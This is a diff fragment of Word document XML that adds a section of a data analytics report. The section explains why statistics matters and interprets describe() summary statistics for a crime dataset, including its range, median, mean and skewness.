-      <w:r>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Statistics is essential for data analytics because it enables data scientists and analysts to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Summarize and describe the data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Identify patterns, trends, and relationships in data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Make predictions and draw conclusions about populations based on a sample of data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Test hypotheses and determine the statistical significance of relationships between variables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Communicate insights and findings to stakeholders in a clear and concise manner</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Using the method describe, we can get important information from the result</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Ex:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Mean</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>: The average of crime over these types.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Max</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>: The largest value in the type of crime.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Median</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>: (middle value) of recorded crime incidents.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Minimum</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>: and maximum values in the dataset.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Standard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> deviation to measure the spread of the data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40E1CC9B" wp14:editId="265FFD27">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2125980</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>26670</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4141470" cy="1541780"/>
+                <wp:effectExtent l="0" t="0" r="11430" b="20320"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="217" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4141470" cy="1541780"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyA"/>
+                              <w:spacing w:line="288" w:lineRule="auto"/>
+                              <w:jc w:val="both"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">From this </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t>“.</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t>describe</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t>()”</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> method, we can get some insights:</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:numPr>
+                                <w:ilvl w:val="0"/>
+                                <w:numId w:val="16"/>
+                              </w:numPr>
+                              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                              <w:t>There is a wide range of 'VALUE' in the dataset, with values ranging from 0 to 20,707.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:numPr>
+                                <w:ilvl w:val="0"/>
+                                <w:numId w:val="16"/>
+                              </w:numPr>
+                              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                              <w:t>The high standard deviation suggests that there is a significant dispersion of values</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                              <w:t>.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:numPr>
+                                <w:ilvl w:val="0"/>
+                                <w:numId w:val="16"/>
+                              </w:numPr>
+                              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                                <w:lang w:eastAsia="en-IE"/>
+                              </w:rPr>
+                              <w:t>The median value of 109 indicates the central tendency, but the mean is higher at 1,560.19, suggesting potential skewness in the data.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p/>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="40E1CC9B" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:167.4pt;margin-top:2.1pt;width:326.1pt;height:121.4pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyA"/>
+                        <w:spacing w:line="288" w:lineRule="auto"/>
+                        <w:jc w:val="both"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">From this </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t>“.</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t>describe</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t>()”</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> method, we can get some insights:</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:numPr>
+                          <w:ilvl w:val="0"/>
+                          <w:numId w:val="16"/>
+                        </w:numPr>
+                        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                        <w:t>There is a wide range of 'VALUE' in the dataset, with values ranging from 0 to 20,707.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:numPr>
+                          <w:ilvl w:val="0"/>
+                          <w:numId w:val="16"/>
+                        </w:numPr>
+                        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                        <w:t>The high standard deviation suggests that there is a significant dispersion of values</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                        <w:t>.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:numPr>
+                          <w:ilvl w:val="0"/>
+                          <w:numId w:val="16"/>
+                        </w:numPr>
+                        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                          <w:sz w:val="20"/>
+                          <w:szCs w:val="20"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                        <w:t>The median value of 109 indicates the central tendency, but the mean is higher at 1,560.19, suggesting potential skewness in the data.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p/>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8AAD24" wp14:editId="20697BEB">
+            <wp:extent cx="1909482" cy="1558552"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="1229985409" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1229985409" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1929025" cy="1574504"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
